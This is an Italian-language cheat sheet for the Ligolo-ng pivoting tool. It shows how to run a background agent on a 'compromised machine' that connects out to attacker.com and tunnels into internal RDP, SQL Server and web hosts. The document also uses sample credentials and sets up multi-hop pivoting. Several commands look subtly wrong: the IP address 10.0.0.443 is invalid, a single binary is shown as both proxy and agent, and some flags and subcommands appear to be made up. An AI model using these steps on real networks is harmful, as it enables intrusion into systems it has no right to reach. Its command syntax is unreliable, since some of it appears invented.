Ligolo-ng

Installazione

Linux/macOS

# Download latest release
wget https://github.com/nicocha30/ligolo-ng/releases/download/v0.4.10/ligolo-ng_0.4.10_Linux_x86_64.tar.gz

# Extract
tar -xzf ligolo-ng_0.4.10_Linux_x86_64.tar.gz

# Make executable
chmod +x ligolo-ng

# Move to PATH
sudo mv ligolo-ng /usr/local/bin/

# Verify installation
ligolo-ng -h

Windows

# Download from releases
Invoke-WebRequest -Uri "https://github.com/nicocha30/ligolo-ng/releases/download/v0.4.10/ligolo-ng_0.4.10_Windows_x86_64.zip" -OutFile "ligolo.zip"

# Extract
Expand-Archive ligolo.zip

# Or download manually from GitHub releases page
# Add to PATH if needed

Utilizzo di Docker

# Build from source
git clone https://github.com/nicocha30/ligolo-ng.git
cd ligolo-ng
docker build -t ligolo-ng .

# Run proxy
docker run -it -p 11601:11601 ligolo-ng ./ligolo-ng -bind 0.0.0.0:11601 -selfcert

Panoramica dell’Architettura

Componenti

┌─────────────────────┐
│  Attacker Machine   │
│   (Proxy Server)    │
│  ligolo-ng proxy    │
│  :11601 (listener)  │
└────────────┬────────┘
             │ TLS/TCP
      ┌──────┴──────┐
      │  Internet   │
      └──────┬──────┘
             │
┌────────────▼────────────┐
│ Compromised Host        │
│ (Pivot Point)           │
│ ligolo-ng agent         │
│ Connects to proxy       │
│ Routes traffic          │
└────────────┬────────────┘
             │
┌────────────▼────────────┐
│ Internal Network        │
│ Unreachable targets     │
│ 10.0.0.0/8             │
└─────────────────────────┘

Configurazione di Base

Proxy Server (Macchina dell’Attaccante)

# Generate self-signed certificate
ligolo-ng -gen-cert -cert-file=cert.pem -key-file=key.pem

# Start proxy listener
ligolo-ng -bind 0.0.0.0:11601 -cert=cert.pem -key=key.pem

# Or without cert (auto-generate)
ligolo-ng -bind 0.0.0.0:11601 -selfcert

# With custom network interface
ligolo-ng -bind 192.168.1.100:11601 -selfcert

# Specify log level
ligolo-ng -bind 0.0.0.0:11601 -selfcert -loglevel=4

Agente (Macchina Compromessa)

# Connect to proxy
ligolo-ng -connect 192.168.1.100:11601 -tunnel-allow-insecure

# With certificate verification
ligolo-ng -connect 192.168.1.100:11601 -ca-file=ca.pem

# Background execution
nohup ligolo-ng -connect 192.168.1.100:11601 -tunnel-allow-insecure &

# Windows background execution
START /B ligolo-ng.exe -connect 192.168.1.100:11601 -tunnel-allow-insecure

Gestione dei Listener

Creazione di Listener

# Interactive mode - add listener
# In ligolo-ng CLI:
listener add --bind 0.0.0.0:3389 --to 10.0.0.5:3389
listener add --bind 0.0.0.0:80 --to 10.0.0.10:80
listener add --bind 127.0.0.1:5432 --to 10.0.0.20:5432

# Multiple listeners
listener add --bind 0.0.0.0:8080 --to 10.0.0.1:8080
listener add --bind 0.0.0.0:8081 --to 10.0.0.2:8080
listener add --bind 0.0.0.0:8082 --to 10.0.0.3:8080

Comandi del Listener

# List active listeners
listener list

# Remove listener
listener remove --id=0

# View listener details
listener show --id=0

# Enable/disable listener
listener set --id=0 --enabled=false
listener set --id=0 --enabled=true

Gestione dell’Interfaccia Tunnel

Configurazione dell’Interfaccia di Rete

# List tunnel interfaces
interface list

# Create virtual interface (Linux)
interface add --name=tun0 --address=10.0.0.1/24

# Add interface to active tunnel
interface attach --id=0 --name=tun0

# View interface routing table
interface show --id=0

# Delete interface
interface delete --id=0 --name=tun0

Configurazione del Routing

# Add static route through tunnel
interface route add --id=0 --network=10.0.0.0/8 --via=10.0.0.1

# View routes
interface route list --id=0

# Remove route
interface route delete --id=0 --network=10.0.0.0/8

# Default gateway through tunnel
interface route add --id=0 --network=0.0.0.0/0 --via=10.0.0.1

Scenari Pratici di Tunneling

Scenario 1: Accesso RDP a Server Interno

# On attacker machine, start proxy
ligolo-ng -bind 0.0.0.0:11601 -selfcert

# On compromised machine, connect agent
ligolo-ng -connect attacker.com:11601 -tunnel-allow-insecure

# In proxy CLI, add RDP listener
listener add --bind 0.0.0.0:3389 --to 10.0.0.50:3389

# Connect RDP from attacker
rdesktop 127.0.0.1:3389
xfreerdp /v:127.0.0.1:3389 /u:admin /p:password

# Or via mstsc.exe on Windows
mstsc.exe /v:127.0.0.1:3389

Scenario 2: Accesso al Database Attraverso Pivot

# Add SQL Server listener
listener add --bind 127.0.0.1:1433 --to 10.0.0.100:1433

# Connect via tools on attacker
sqlcmd -S 127.0.0.1,1433 -U admin -P password -d database

# Or use GUI tools
# DBeaver: New Connection > SQL Server > localhost:1433

# Verify connectivity
nmap -p 1433 127.0.0.1

Scenario 3: Accesso all’Applicazione Web

# Setup HTTP/HTTPS listeners
listener add --bind 0.0.0.0:8080 --to 10.0.0.80:80
listener add --bind 0.0.0.0:8443 --to 10.0.0.443:443

# Access via browser or curl
curl http://127.0.0.1:8080/
curl https://127.0.0.1:8443/ -k

# Burp Suite integration
# Burp > Proxy > Options > Upstream Proxy
# Server: 127.0.0.1, Port: 8080

Scenario 4: Pivoting Concatenato (Multi-hop)

# First pivot setup
# Attacker -> Pivot1
# Pivot1 runs agent connecting to attacker

# From pivot1, discover internal network
# Add second pivot
listener add --bind 0.0.0.0:11602 --to 10.0.0.2:11601

# On internal machine, connect to pivot1
ligolo-ng -connect 10.0.0.1:11602 -tunnel-allow-insecure

# Now can route through both pivots
listener add --bind 0.0.0.0:3306 --to 10.0.0.100:3306

Configurazione Avanzata

Routing dell’Interfaccia (Linux)

# Create tun interface for all traffic
interface add --name=tun0 --address=10.0.0.1/24

# Route specific subnet
sudo route add -net 10.0.0.0/8 gw 10.0.0.1

# Or use ip command
sudo ip route add 10.0.0.0/8 via 10.0.0.1 dev tun0

# View routing table
sudo route -n
ip route show

# Add default route through tunnel (be careful!)
sudo ip route add 0.0.0.0/1 via 10.0.0.1 dev tun0

Tuning delle Prestazioni

# Increase buffer sizes (in proxy config)
ligolo-ng -bind 0.0.0.0:11601 -selfcert -buf-size=65536

# Set goroutines limit
ligolo-ng -bind 0.0.0.0:11601 -selfcert -max-conns=1000

# Optimize for high-bandwidth tunnels
ligolo-ng -bind 0.0.0.0:11601 -selfcert -tls-version=1.3

Configurazione TLS

# Using custom certificates
ligolo-ng -bind 0.0.0.0:11601 \
  -cert=server.crt \
  -key=server.key \
  -ca=ca.crt

# Verify agent certificate
ligolo-ng -connect proxy.com:11601 \
  -ca-file=ca.crt \
  -cert-file=client.crt \
  -key-file=client.key

Risoluzione dei Problemi

Problemi di Connessione

# Test connectivity from agent to proxy
# On compromised machine
telnet attacker.com 11601
nc -zv attacker.com 11601

# Check firewall rules
# Linux
sudo iptables -L | grep 11601
sudo ufw status | grep 11601

# Windows
netsh advfirewall firewall show rule name=all | grep 11601

Problemi di Routing

# Verify routes are active
listener list
interface list

# Test connectivity to internal server
# Through listener (from attacker)
telnet 127.0.0.1 3389

# Check MTU
ping -M do -s 1472 internal.server

# Enable verbose logging
ligolo-ng -bind 0.0.0.0:11601 -selfcert -loglevel=4

Problemi di Prestazioni

# Monitor tunnel statistics
# In CLI: tunnel info

# Check agent health
# In CLI: agent list

# Reduce listener count if needed
listener remove --id=X

# Monitor network
# Linux
iftop -i tun0
nethogs

Migliori Pratiche di Sicurezza

Gestione dei Certificati

# Generate certificate with proper CN
openssl req -new -x509 -days 365 -nodes \
  -out cert.pem -keyout key.pem \
  -subj "/C=US/ST=State/L=City/O=Org/CN=proxy.domain.com"

# Verify certificate chain
openssl verify -CAfile ca.pem cert.pem

# Check certificate expiry
openssl x509 -in cert.pem -text -noout | grep "Not After"

Isolamento della Rete

# Limit listener binding
listener add --bind 127.0.0.1:3389 --to 10.0.0.5:3389
# Only accessible from localhost

# Use firewall rules
sudo iptables -A INPUT -p tcp --dport 11601 -s attacker_ip -j ACCEPT
sudo iptables -A INPUT -p tcp --dport 11601 -j DROP

Sicurezza delle Credenziali

# Use authentication if available
# Check for auth mechanism in documentation

# Disable insecure mode in production
# Instead of: -tunnel-allow-insecure
# Use proper certificate-based auth

# Monitor tunnel activity
listener show --id=0

Riferimento dei Comandi CLI

# Listener commands
listener add --bind <BIND> --to <TARGET>
listener remove --id=<ID>
listener list
listener show --id=<ID>

# Interface commands
interface add --name=<NAME> --address=<ADDR/MASK>
interface list
interface attach --id=<ID> --name=<NAME>
interface delete --id=<ID> --name=<NAME>
interface route add --id=<ID> --network=<NET> --via=<GW>
interface route list --id=<ID>

# Agent commands
agent list
agent info --id=<ID>
agent close --id=<ID>

# General
help
exit

Riferimenti

• Ligolo-ng GitHub
• Ligolo-ng Documentation
• Network Pivoting Guide
• Red Teaming

---

Last updated: 2026-03-30